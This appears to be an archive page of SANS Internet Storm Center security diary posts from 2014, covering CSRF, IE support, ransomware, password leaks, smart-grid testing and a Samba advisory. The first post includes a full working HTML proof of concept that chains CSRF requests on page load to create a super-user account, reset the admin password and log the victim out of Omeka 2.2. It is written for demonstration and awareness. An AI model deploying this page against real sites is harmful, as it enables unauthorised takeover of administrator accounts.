A significant number of the functions were vulnerable to Cross Site Request Forgery (CSRF or XSRF), which is also known as session riding and transaction injection. The functions that were vulnerable had absolutely no anti-XSRF protection, and the interesting ones were all in the administrator part of the site. An attacker could add a new user, put the user in the administrator group, change the passwords, and log out. The problem was, each of these were different transactions, and had to be performed in the correct order to pull off the attack. The application owner and the development team did not appreciate the severity of the issue, and pointed out that their automated scanning tool had not identified the issue, therefore it didn't exist. Even if the issue did exist, it could only be of medium severity, because their tool said so. To top it all off, even if an attacker could pull off this mythical attack, it could not be done in one shot, the administrator had to click multiple times. In short, they did not appreciate the impact, the attacker would have complete control over the application. In order to make my point a demonstration was in order, that did the following:

  • Add a new user
  • Put the user in an administrator group
  • Lockout the super-user account
  • Logout the super-user accoun;
  • Did the functions in the correct order
  • Each function would wait for the last to complete
  • Was all in one HTML page
  • Would force the administrator to view a certain Rick Astley video :)
  • OK, we didn't do the last one, that would be WAY too mean.

My Google-fu was with me that day, I discovered a post by Tim Tomes (lanmaster53) that described exactly what I wanted to do. He also had sample code to start with:
http://www.lanmaster53.com/2013/07/multi-post-csrf/
The next problem was that obviously I could use their custom application to do the proof of concept, but I needed another application with similar vulnerabilities to demo for this post. Once again the Google-fu was with me:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5193.php
Omeka is a free and open source web publishing application. Also quick and easy to install. Also quick and easy to exploit. Last, but not least, I could download the vulnerable version 2.2 and be up and running in no time.

Administrator (victim) logs into the application:

The add user function as seen in an interception proxy (OWASP ZAP):

The code running:

Now the code. The important parts are getting the script to run, I used a body onload. The script runs each one of the forms. The forms each contain one of the XSF attacks. Each form loads in a different iframe. The first one runs, then the second one waits from the iframe onload to fire before it runs, and so on. Victim logs in, they check their queue, the XSS runs, the XSRF runs, they have lost control of the application, attacker win.

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

Check out BSides Ottawa, our CfP is still open! Con is 5-6 September
http://www.bsidesottawa.ca/
I will be teaching SANS Sec560, Network Penetration Testing next in Albuquerque, NM !
http://www.sans.org/event/albuquerque-2014/course/network-penetration-testing-ethical-hacking

References:

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
http://cwe.mitre.org/data/definitions/352.html
http://www.lanmaster53.com/2013/07/multi-post-csrf/
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5193.php
http://omeka.org/
https://www.youtube.com/watch?v=dQw4w9WgXcQ

Code:

<html>
<head>
<title>XSRF Multi-post attack onload</title>
<!-- Creation Date: 31 July 2014 -->
<!-- Author: Adrien de Beaupre -->
<!-- Original code borrowed from Tim Tomes LaNMaSteR53 -->
<!-- Demonstrating multi-post XSRF-->
</head>

<body onload="runme();">
welcome to p0wned by XSRF!

<form name="xsrf0" action="http://intru-shun.ca/omeka/admin/users/add" method="POST" target="frame0">
<input type="hidden" name="username" value="hacker" />
<input type="hidden" name="name" value="evil" />
<input type="hidden" name="email" value="hacker@evil.com" />
<input type="hidden" name="role" value="super" />
<input type="hidden" name="active" value="1" />
</form>

<form name="xsrf1" action="http://intru-shun.ca/omeka/admin/users/change-password/1" method="POST" target="frame1">
<input type="hidden" name="new_password" value="Passw0rd" />
<input type="hidden" name="new_password_confirm" value="Passw0rd" />
</form>

<form name="xsrf2" action="http://intru-shun.ca/omeka/admin/users/logout" method="POST" target=frame2">
<input type="hidden" name="Logout" value="yes" />
</form>

<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>

<script>
function runme()
{
document.xsrf0.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.xsrf1.submit();
document.getElementsByTagName("iframe")[1].onload = function()
{
document.xsrf2.submit();
alert('All your base are belong to us')
}
}
}
</script>

</body>
</html>

1 Comments

Published: 2014-08-09

Microsoft & IE support plans, best be on IE11 by 01/2016

Microsoft announced in their blog on the 8th (thanks Allan for the heads up) that starting January 2016 the browsers that will be supported are: 

  • Vista SP2 - IE9
  • 2008 SP2 - IE9 
  • Windows 7 - IE11
  • 2008 R2 SP1 - IE11
  • Windows 8.1 - IE11
  • 2012 - IE10
  • 2012 R2 - IE11

​I can hear the security brain cells cheer and the business brain cells cringe.  From a security perspective running the latest browser typically makes sense.  However from a business perspective this may cause quite a few issues in many organisations.  Older applications were often written for specific browser versions, so to upgrade or allow for those to continue to function may not be a trivial task.  The blog does explain that you may be able to use "Enterprise mode" in IE11.  This might be one way to migrate for your organisation (http://blogs.msdn.com/b/ie/archive/2014/04/02/stay-up-to-date-with-enterprise-mode-for-internet-explorer-11.aspx)  

The blog entry also has what I'd like to call a few interesting throwaway lines.  For example "After January 12, 2016, only the most recent version of Internet Explorer available for a supported operating system will receive technical support and security updates." In other words you may have to migrate to IE12 when it becomes available for the OS you use.  

In short if you are not using the latest Internet Explorer in your organisation you may have limited time to get it sorted before your risk profile increases dramatically, unless of course all the bad guys promise to only concentrate on current versions of the browser. 

MS Blog can be found here --> http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx

Cheers

Mark H 

2 Comments

Published: 2014-08-08

Coming up next: Microsoft Patch Tuesday

Microsoft will publish 9 bulletins next patch tuesday, with 7 important and 2 critical bulletins. More information at https://technet.microsoft.com/library/security/ms14-aug

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

0 Comments

Published: 2014-08-07

Checking for vulnerabilities in the Smart Grid System

SCADA systems are not composed the same way as regular IT systems. Therefore, the risk and vulnerability assessment cannot be performed as it is done for any other IT system. The most important differences are:

  • SCADA Pentesting should not be done in production environment: SCADA devices are very fragile and some activities that could pose harmless to regular IT environments could be catastrophic to the process availability. Think of massive blackouts or no water supply for a city.
  • SCADA devices have specific outputs for the industrial process they are controlling. The architecture and operating systems are not the same, so risks assessment approach is not performed in the same way. For electrical systems, we need to address devices belonging to the Advanced Metering Infrastructure (AMI), Demand Response (DR), Distributed Energy Resources (DER), Distributed Grid Management (DGM), Electric Transportation (ET) and Wide Area Monitong, Protection and Control (WAMPAC). This means we need to address devices like the following, instead of conventional network devices, services, laptops, desktop computers or mobile devices:
AMI Meters
Relays
Aggregators
Access points
DR Energy Resources
Digital Control Unit
DER DER Managed generation and storage devices
Customer Energy Management System
DGM Automated Reclosure
Remote Fault Indicators
Capacitor Banks
Automated Switches
Load Monitor
Substation Breakers
WAMPAC Phasor Measurement Units
Device which includes Phasor Measurement Unit capabilities
Field Deployed Phasor Data Concentrator
Field Deployed Phasor Gateways

Table 1: Devices in the Smartgrid Network

This means we need to considering a specific methodology for this type of infrastructure that leads to effective risk mitigation for proper detection of vulnerabilities in the smartgrid system. I want to recommend one today named Guide to Penetration Testing for Electric Uitilities created by the National Electric Sector Cybersecurity Organization Resource (NESCOR). This metodology is composed by the following steps:

 

NESCOR Pentest Model

Source: http://www.smartgrid.epri.com/doc/NESCORGuidetoPenetrationTestingforElectricUtilities-v3-Final.pdf

Let's explain the steps a little bit:

  • Penetration Test Scoping: You need to decide which sector of the entire system will be the target of the assessment. Could be a substation, generation plant or any other device listed in table 1. The scope could even be the entire system.
  • Architecture Review: You want to learn the context of the entire system. This is the first step of information acquisition. Can be done checking the documentation of the system and analyzing the configuration of the devices part of the scope.You can also check for information in the same way as it is done with conventional pentesting like google, shodan, maltego and social networks.
  • Target System Setup: You don't want to perform a pentesting in a smartgrid live production environment. Instead, you need to setup an environment with the same configuration, as much as possible, to the live configuration of the smartgrid production environment. That's how we can get a full list of the vulnerabilities performing even dangerous test without affecting the availability of the electrical service.
  • Server OS, Server application, Network Communication and Embedded device penetration tasks: Those are the specific pentest tasks within the target systems. You can use several tools like
  • End to end penetration testing analysis: You need to ensure that all possible inputs from external systems to all systems in the scope have been tested and evaluated as possible vulnerable points for attacks.
  • Result interpretation and reporting: As always, you need to develop a report including the vulnerabilities that could be exploited, the risks associated, the remediation steps and other recommendations that could be applied.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

0 Comments

Published: 2014-08-06

Free Service to Help CryptoLocker Victims by FireEye and Fox-IT

Various Internet Storm Center Handlers have written Diaries on the malware called CryptoLocker, a nasty piece of malware which encrypting the files of the systems it infects, then gives victims 72 hours to pay the ransom to receive a private key that decrypts those files. There are still victims out there with encrypted files, and if you're one of them or know of someone affected, the folks at FireEye and Fox-IT have created a web portal https://www.decryptcryptolocker.com/ to decrypt those files. 

This is a free service for any afflicted by CryptoLocker, many of which are small businesses without the resources to deal with this properly, so let people know.

Using the site is very straight forward (Steps taken from the FireEye blog[1]):

How to use the DecryptCryptoLocker tool

Users need to connect to the https://www.decryptcryptolocker.com/ 
Identify a single, CryptoLocker-encrypted file that they believe does not contain sensitive information.
Upload the non-sensitive encrypted file to the DecryptCryptoLocker portal.
Receive a private key from the portal and a link to download and install a decryption tool that can be run locally on their computer.
Run the decryption tool locally on their computer, using the provided private key, to decrypt the encrypted files on their hard drive.
DecryptCryptoLocker is available globally and does not require users to register or provide contact information.

This is a fantastic resource from both FireEye and Fox-IT, so thanks to all involved in making this happen and making it free to use.

For more background on CryptoLocker from Fox-IT, read their CryptoLocker ransomware intelligence report [2].

 

[1] http://www.fireeye.com/blog/corporate/2014/08/your-locker-of-information-for-cryptolocker-decryption.html

[2] http://blog.fox-it.com/2014/08/06/cryptolocker-ransomware-intelligence-report/

Chris Mohan --- Internet Storm Center Handler on Duty

3 Comments

Published: 2014-08-06

Exploit Available for Symantec End Point Protection

An exploit is now available at exploit-db.com for the Symantec End Point Protection privilege escalation vulnerability. Symantec released a patch for this issue earlier this week [1].

The vulnerability requires normal-user access to the affected system and can be used to escalate privileges to fully control the system (instead of being limited to a particular user) so this will make a great follow up exploit to a standard drive-by exploit that gains user privileges.

We have gotten some reports that users have problems installing the patch on legacy systems (e.g. Windows 2003). Applying the patch just fails in these cases and appears to have no ill effect on system stability.

[1] http://www.symantec.com/business/support/index?page=content&id=TECH223338

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

5 Comments

Published: 2014-08-06

All Passwords have been lost: What's next?

Some of it may be hype. But no matter if 500 Million, 1.5 Billion or even 3.5 Billion passwords have been lost as yesterday's report by Hold Security states, given all the password leaks we had over the last couple years it is pretty fair to assume that at least one of your passwords has been compromised at some point. [1]

yes. we have talked about this many times, but it doesn't seem to get old sadly.

So what next? Password have certainly been shown to "not work" to authenticate users. But being cheap, they still are used by most websites (including this one, but we do offer a 2-factor option). 

For web sites:

  • review your password policies. There is no "right" policy, but come up with something that rejects obvious weak passwords and on the other hand, allows users to choose passwords that they can remember (so they can have a unique password for your site).
  • Make sure your site works with commonly used password managers. The only real way for the user to have a unique password for each site is a password manager.
  • lock accounts that haven't been used in a long time, and delete their password from your database forcing a password reset if they try to reactivate it
  • consider two factor authentication, at least as an option and maybe mandatory for high value accounts (e.g. administrators). Google authenticator is probably the easiest one to implement  and it is free. We talked about other alternatives in the past as well.

For users:

  • Have a unique password for each site. As an alternative, you may have a single "throw away" password for sites that you don't consider important. But be aware that at one point, a site that is not important now, may become important as you are doing more business with them.
  • Use a password safe, if possible one that allows syncing locally without having to send your password collection to a cloud service.
  • For important sites that don't allow for two factor authentication, consider a "two-part password": One part will be kept in your password safe, while the second part you type in. The password safe part is unique to the site while the additional second part can be the same for different sites or at least easy to remember. This will give you some protection against a compromised password safe.
  • Change passwords once in a while (I personally like every 6 months... ) in particular the "static" part of these high-value passwords.
  • Ask sites that you consider important to implement 2-factor authentication.

That's at least what I can come up with while sipping on my first cup of coffee for the day. 

[1] http://www.holdsecurity.com/news/cybervor-breach/

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

13 Comments

Published: 2014-08-05

Synolocker: Why OFFLINE Backups are important

One current threat causing a lot of sleepless nights to victims is "Cryptolocker" like malware. Various variations of this type of malware are still haunting small businesses and home users by encrypting files and asking for ransom to obtain the decryption key. Your best defense against this type of malware is a good backup. Shadow volume copies may help, but aren't always available and complete.

In particular for small businesses, various simple NAS systems have become popular over the recent years. Different manufacturers offer a set of Linux based devices that are essentially "plug and play" and offer high performance RAID protected storage that is easily shared on the network. One of these vendors, Synology, has recently been somewhat in the cross hairs of many attacks we have seen. In particular vulnerabilities int he web based admin interface of the device have led to numerous exploits we have discussed before. 

The most recent manifestation of this is "Synolocker", malware that infects Synology disk storage devices and encrypts all files, similar to the original cryptolocker. Submissions to the Synology support forum describe some of the results [1].

The malware will also replace the admin console index web page with a ransom message, notifying the user of the exploit. It appears however that this is done before the encryption finishes. Some users where lucky to notice the message in time and were able to save some files from encryption.

It appears that the best way to deal with this malware if found is to immediatly shut down the system and remove all drives. Then reinstall the latest firmware (may require a sacrificial drive to be inserted into the system) before re-inserting the partially encrypted drives.

To protect your disk station from infection, your best bet is:

  • Do not expose it to the internet, in particular the web admin interface on port 5000
  • use strong passwords for the admin functions
  • keep your system up to date
  • keep offline backups. this could be accomplished with a second disk station that is only turned on to receive the backups. Maybe best to have two disk stations from different manufacturers.

It is important to note that while Synology has been hit the hardest with these exploits, other devices from other manufacturers had vulnerabilities as well and the same security advice applies (but typically, they listen on ports other then 5000). 

[1] http://forum.synology.com/enu/viewtopic.php?f=3&t=88716

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

4 Comments

Published: 2014-08-05

Legal Threat Spam: Sometimes it Gets Personal

Yesterday, I spotted the following tweet mentioning me:

Needless to say, I got intrigued, and luckily the sender of the tweet was willing to share a sample.

The sample turned out to be simple legal threat malware e-mail written in German. The e-mail claimed that the recipient downloaded a copyrighted movie and it asked for legal fees. The invoice for the legal fees was supposed to be included in the attached ".cab" file.

From: "Johannes Ullrich"  
To: [removed].de
Subject: [vorfall:132413123]

Guten Tag,

Am 01.08.2014 wurde von Ihrem Rechner mit der IP-Addresse 192.0.2.1 um 12:13:01 der Film "Need for Speed" geladen. Nach §19a UrhG ist dies eine kriminelle Handlung. Unsere Anwaltskanzlei  muss dies ans zuständige Amtsgericht melden, außer Sie Zahlen ein außergerichtliches Strafgeld in Höhe von 436.43 Euro an uns.
Die Rechnung "1234.cab" entnehmen Sie dem Anhang.

Hochachtungsvoll,
Johannes Ullrich
+4991312341234

The attached .cab file runs a typical trojan downloader that could download various pieces of malware. A quick search shows a number of other reports of this email, with different "From:" names. It looks like it picks plausible German names, maybe from the contact list of infected systems. My names isn't that terrible unusual, so I don't think this is targeted at all. Sometimes it is just an odd coincidence, and they aren't really after you.

In the case above, the "From" e-mail address is not related to me. However, if an attacker sends spam using your e-mail address, it is very useful to have DMARC configured for your domain. With DMARC, you give the receiving mail server the option to report any e-mail that fails the DKIM or SPF tests to you. Only a few mail servers do so, but some of them are major public web mail systems. For example, here a quick report I just received for a domain I own:


(click on image for full size)

The attachment does include a report with details why the e-mail was found to be suspect (of course, you should still be careful with attachments. These reports can be faked too!) ;-).

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

0 Comments

Published: 2014-08-04

Threats & Indicators: A Security Intelligence Lifecycle

In our recent three-part series, Keeping the RATs Out (Part 1, Part 2, Part 3), I tried to provide analysis offering you an end-to-end scenario wherein we utilized more than one tool to solve a problem. I believe this to be very useful particularly when making use of threat intelligence. Following is a partial excerpt from my toolsmith column, found monthly in the ISSA Journal, wherein I built on the theme set in the RATs series. I'm hopeful Threats & Indicators: A Security Intelligence Lifecycle helps you build or expand your threat intelligence practice.

I receive and review an endless stream of threat intelligence from a variety of sources. What gets tricky is recognizing what might be useful and relevant to your organizations and constituencies. To that end I’ll take one piece of recently received intel and work it through an entire lifecycle. This intel came in the form of an email advisory via the Cyber Intelligence Network (CIN) and needs to remain unattributed. The details, to be discussed below, included malicious email information, hyperlinks, redirects, URL shorteners, ZIP archives, malware, command and control server (C2) IPs and domain names, as well as additional destination IPs and malicious files. That’s a lot of information but sharing it in standards-based, uniform formats has never been easier. Herein is the crux of our focus for this month. We’ll use Mandiant’s IOCe to create an initial OpenIOC definition, Mitre’s OpenIOC to STIX, a Python utility to convert OpenIOC to STIX, STIXviz to visualize STIX results, and STIX to HTML, an XSLT stylesheet that transforms STIX XML documents into human-readable HTML. Sounds like a lot, but you’ll be pleasantly surprised how bang-bang the process really is. IOC represents Indicators Of Compromise (in case you just finally just turned off your vendor buzzword mute button) and STIX stands for Structured Threat Information eXpression. STIX, per Mitre, is a “collaborative community-driven effort to define and develop a standardized language to represent structured cyber threat information.” It’s well worth reading the STIX use cases. You may recall that Microsoft recently revealed the Interflow project which incorporates STIX, TAXII (Trusted Automated eXchange of Indicator Information), and CybOX (Cyber Observable eXpression standards) to provide “an automated machine-readable feed of threat and security information that can be shared across industries and community groups in near real-time.“ Interflow is still in private preview but STIX, OpenIOC, and all these tools are freely and immediately available to help you exchange threat intelligence...
 
Keep reading Threats & Indicators: A Security Intelligence Lifecycle here.

0 Comments

Published: 2014-08-02

All Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon

A remote code execution in nmbd (the NetBIOS name services daemon) has been found in Samba versions 4.0.0 to 4.1.10. ( assgined CVE-2014-3560) and a patch has been release by the team at samba.org.

Here's the details from http://www.samba.org/samba/security/CVE-2014-3560

 
===========
Description
===========

All current versions of Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon.

A malicious browser can send packets that may overwrite the heap ofthe target nmbd NetBIOS name services daemon. It may be possible to use this to generate a remote code execution vulnerability as the superuser (root).
 
==================
Patch Availability
==================

A patch addressing this defect has been posted to

  http://www.samba.org/samba/security/

Additionally, Samba 4.1.11 and 4.0.21 have been issued as security releases to correct the defect. Patches against older Samba versions are available at http://samba.org/samba/patches/. Samba vendors and administrators running affected versions are advised to upgrade or apply the patch as soon as possible.

==========
Workaround
==========

Do not run nmbd, the NetBIOS name services daemon.

 

Chris Mohan --- Internet Storm Center Handler on Duty

1 Comments